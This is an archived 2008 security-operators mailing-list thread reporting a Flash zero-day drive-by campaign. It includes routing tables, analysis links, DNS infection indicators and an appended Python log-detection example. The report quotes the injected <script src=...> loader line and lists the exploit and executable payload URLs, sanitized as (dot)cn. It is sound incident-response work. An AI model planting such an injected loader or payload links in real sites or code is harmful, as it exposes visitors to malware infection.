[nsp-sec] ACK 174 RE: (AS 4837) (Upstream AS 174, 701, 1239, 3257, 3320, 4134, 7018, 7473) Adobe Flash Vulnerability - Details Seen In The Wild
Shelton, Steve
sshelton at Cogentco.com
Wed May 28 06:15:06 EDT 2008
Hello,
The /32 is suffering reduced visibility on Cogent's network.
PEER_AS | IP | AS Name
174 | 221.206.20.145 | COGENT Cogent/PSI
Best regards,
Steve Shelton
Network Security Engineer
Cogent Communications
-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Brian Eckman
Sent: Tuesday, May 27, 2008 4:09 PM
To: nsp-security at puck.nether.net
Subject: [nsp-sec] (AS 4837) (Upstream AS 174, 701, 1239, 3257, 3320, 4134, 7018, 7473) Adobe Flash Vulnerability - Details Seen In The Wild
----------- nsp-security Confidential --------
nsp-sec,
> host www.dota11.cn
www.dota11.cn has address 221.206.20.145
> host www.woai117.cn
www.woai117.cn has address 221.206.20.145
> host www.117276.cn
www.117276.cn has address 221.206.20.145
AS | IP | AS Name
4837 | 221.206.20.145 | CHINA169-BACKBONE CNCGROUP China169 Backbone
PEER_AS | IP | AS Name
174 | 221.206.20.145 | COGENT Cogent/PSI
701 | 221.206.20.145 | UUNET - MCI Communications Services, Inc. d/b/a Verizon Business
1239 | 221.206.20.145 | SPRINTLINK - Sprint
3257 | 221.206.20.145 | TISCALI-BACKBONE Tiscali Intl Network BV
3320 | 221.206.20.145 | DTAG Deutsche Telekom AG
4134 | 221.206.20.145 | CHINANET-BACKBONE No.31,Jin-rong Street
7018 | 221.206.20.145 | ATT-INTERNET4 - AT&T WorldNet Services
7473 | 221.206.20.145 | SINGTEL-AS-AP Singapore Telecom
(Malicious URLs sanitized to (dot)cn instead of .cn to avoid accidental access.)
This is all based off my experience with this problem this afternoon, and is surely incomplete. However, I hope that it's timely and helpful regardless...
Many of you have probably seen reports of a 0-day exploit in Adobe Flash
Player. SANS Internet Storm Center has a diary entry at
http://isc.sans.org/diary.html?n&storyid=4465. Symantec raised their
ThreatCon as outlined at
http://www.symantec.com/security_response/threatconlearn.jsp
I've seen evidence of a mass defacement (similar - likely identical - to the recent SQL injections apparently coming from China and noted in various advisories), where <script src=http://www.dota11(dot)cn/m.js> has been inserted into the HTML source of many Web sites. m.js on that site, among other things, loads up http://www.woai117(dot)cn/4561.swf or http://www.woai117(dot)cn/4562.swf. After one of those flash scripts determines the flash version, the browser is then pointed to http://www.woai117(dot)cn/WIN%20<insert-flash-player-version-here>[f|i].swf (example: http://www.woai117(dot)cn/WIN%209,0,115,0f.swf for Adobe Flash Player 9,0,115,0 for Windows) (likely more than just the letters "f" and "i" can be appended - again - I'm just sharing what I've observed in limited testing).
In my testing, the exploits for 9,0,124,0 are NOT there, even though browsers will be pointed to a page like "WIN%209,0,124,0f.swf" (a 404 page is returned with no additional exploits, as far as I've seen). My hunch is that there were exploits for that version earlier (simply based off of Symantec's claim), but pulled it for some reason - perhaps to try to keep certain 0day code as 0day for longer. (Or else Symantec is wrong. Not like that ever happens!) ;-)
On my test XP box with Flash Viewer 9,0,115,0, the "GET /WIN%209,0,115,0f.swf" request downloaded the .swf, which in turn ultimately caused all of the following to be downloaded and executed:
http://www.woai117(dot)cn/117.exe
http://www.117276(dot)cn/1.exe
http://www.117276(dot)cn/2.exe
http://www.117276(dot)cn/3.exe
http://www.woai117(dot)cn/bing.exe
http://www.woai117(dot)cn/kiss.txt
The snort rule "ET TROJAN Otwycal User-Agent (Downing)" was triggered by
most, if not all of those downloads.
117.exe analysis
----------------
Virustotal:
http://www.virustotal.com/analisis/20e51bbef245e3eeb3dd9b9835c09291
Anubis Sandbox:
http://anubis.iseclab.org/result.php?taskid=62147cf6aaf70fc4a5fa20516483924c
I believe that queries for "www.117276(dot)cn" might be a reliable indicator of a successful infection - particularly if preceded by "www.dota11(dot)cn" and "www.woai117(dot)cn".
Brian
--
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security
community. Confidentiality is essential for effective Internet security
counter-measures.
_______________________________________________
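Turning the DNS indicator from Brian's post into detection logic, as an added example that is not part of the original thread: it assumes a constructed query log in the form `<timestamp> <client> <qname>` and rates a client highest only when www.117276(dot)cn is first seen after the injected-script host and the exploit host, as the post describes.

```python
# Added example (not from the original post): score DNS query logs for the
# infection chain described in the thread. Assumes a simple text log with
# "<timestamp> <client_ip> <qname>" per line; SAMPLE_LOG is constructed.
from collections import defaultdict

# Indicators from the post, in the order the chain contacts them:
# injected-script host, exploit/payload host, second payload host.
CHAIN = ("www.dota11.cn", "www.woai117.cn", "www.117276.cn")

# Constructed sample log: one full chain, one bare final-stage query,
# one client that only touched the injected-script host.
SAMPLE_LOG = """\
2008-05-27T15:01:02 10.0.0.5 www.example.edu
2008-05-27T15:01:03 10.0.0.5 www.dota11.cn
2008-05-27T15:01:04 10.0.0.5 www.woai117.cn
2008-05-27T15:01:09 10.0.0.5 www.117276.cn
2008-05-27T15:02:00 10.0.0.7 www.117276.cn
2008-05-27T15:03:00 10.0.0.9 www.dota11.cn
"""


def parse_log(text):
    """Yield (client, qname) tuples; skip blank or malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3:
            yield parts[1], parts[2].lower().rstrip(".")


def classify_clients(text):
    """Return {client: verdict} for every client that queried a chain host.

    likely-infected:     all three hosts seen, final host first seen last
    possible-infection:  final host seen without the full preceding chain
    exposed:             only the script or exploit host seen
    """
    seen = defaultdict(list)  # client -> chain hosts in first-seen order
    for client, qname in parse_log(text):
        if qname in CHAIN and qname not in seen[client]:
            seen[client].append(qname)
    verdicts = {}
    for client, hosts in seen.items():
        if set(hosts) == set(CHAIN) and hosts[-1] == CHAIN[2]:
            verdicts[client] = "likely-infected"
        elif CHAIN[2] in hosts:
            verdicts[client] = "possible-infection"
        else:
            verdicts[client] = "exposed"
    return verdicts


if __name__ == "__main__":
    for client, verdict in sorted(classify_clients(SAMPLE_LOG).items()):
        print(client, verdict)
```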